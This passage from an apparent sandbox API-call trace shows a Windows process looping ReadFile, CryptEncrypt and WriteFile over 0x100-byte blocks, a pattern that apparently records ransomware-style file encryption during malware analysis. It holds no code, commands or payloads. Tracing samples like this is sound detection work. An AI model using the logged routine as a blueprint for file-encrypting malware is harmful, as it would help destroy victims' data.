lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.291] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.291] GetLastError () returned 0x0 [0151.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.292] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.292] GetLastError () returned 0x0 [0151.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.293] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.293] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.294] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.294] GetLastError () returned 0x0 [0151.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.294] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.295] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.295] GetLastError () returned 0x0 [0151.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.296] GetLastError () returned 0x0 [0151.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, 